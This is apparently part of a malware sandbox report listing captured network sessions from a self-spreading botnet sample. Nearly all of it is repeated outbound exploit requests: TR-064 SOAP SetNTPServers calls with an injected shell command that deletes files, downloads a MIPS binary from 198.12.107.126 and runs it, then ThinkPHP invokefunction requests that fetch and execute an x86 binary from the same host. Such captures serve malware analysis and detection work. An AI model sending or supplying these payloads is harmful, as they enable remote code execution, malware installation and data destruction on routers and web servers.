                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12192.168.2.134389423.91.39.877547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:57:59.757625103 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13192.168.2.133684071.254.190.147547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:57:59.758657932 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14192.168.2.1344832217.63.48.2067547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:57:59.759551048 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15192.168.2.1338300178.51.106.2377547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:57:59.760569096 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16192.168.2.1343062113.16.91.1047547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:57:59.760607958 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17192.168.2.1351322197.131.140.87547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:00.480084896 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18192.168.2.1335964167.183.152.27547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:00.639007092 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19192.168.2.1340964194.122.191.227547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:00.640024900 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20192.168.2.1337008182.58.1.2427547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:00.641081095 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21192.168.2.1338686219.44.145.47547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:00.642069101 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22192.168.2.1335692128.254.238.517547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:00.643461943 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23192.168.2.1336232167.183.152.27547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:00.644759893 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24192.168.2.1341210194.122.191.227547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:00.645834923 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25192.168.2.1335950128.254.238.517547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:00.649029970 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26192.168.2.1352414110.211.19.1207547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:00.670630932 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27192.168.2.1354220118.8.12.2197547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:00.671726942 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28192.168.2.1354440118.8.12.2197547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:00.677134037 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          29192.168.2.135532046.229.152.1997547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:00.702469110 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          30192.168.2.1358820141.151.90.917547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:00.734426975 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          31192.168.2.1358918141.151.90.917547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:00.740407944 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          32192.168.2.134407823.91.39.877547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:00.766690016 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          33192.168.2.1344884217.63.48.2067547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:00.766765118 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          34192.168.2.1348734112.154.178.25080
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:01.548048019 CET340OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1
                                          Connection: keep-alive
                                          Accept-Encoding: gzip, deflate
                                          Accept: /
                                          User-Agent: Tsunami/2.0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          35192.168.2.1342638112.196.115.6980
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:01.558408976 CET340OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1
                                          Connection: keep-alive
                                          Accept-Encoding: gzip, deflate
                                          Accept: /
                                          User-Agent: Tsunami/2.0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          36192.168.2.1335796112.62.184.5980
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:01.565988064 CET340OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1
                                          Connection: keep-alive
                                          Accept-Encoding: gzip, deflate
                                          Accept: /
                                          User-Agent: Tsunami/2.0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          37192.168.2.1346490112.76.5.20880
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:01.573162079 CET340OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1
                                          Connection: keep-alive
                                          Accept-Encoding: gzip, deflate
                                          Accept: /
                                          User-Agent: Tsunami/2.0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          38192.168.2.1349576112.8.205.24480
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:01.578902960 CET340OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1
                                          Connection: keep-alive
                                          Accept-Encoding: gzip, deflate
                                          Accept: /
                                          User-Agent: Tsunami/2.0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          39192.168.2.1337720112.83.245.23280
                                          TimestampBytes transferredDirectionData
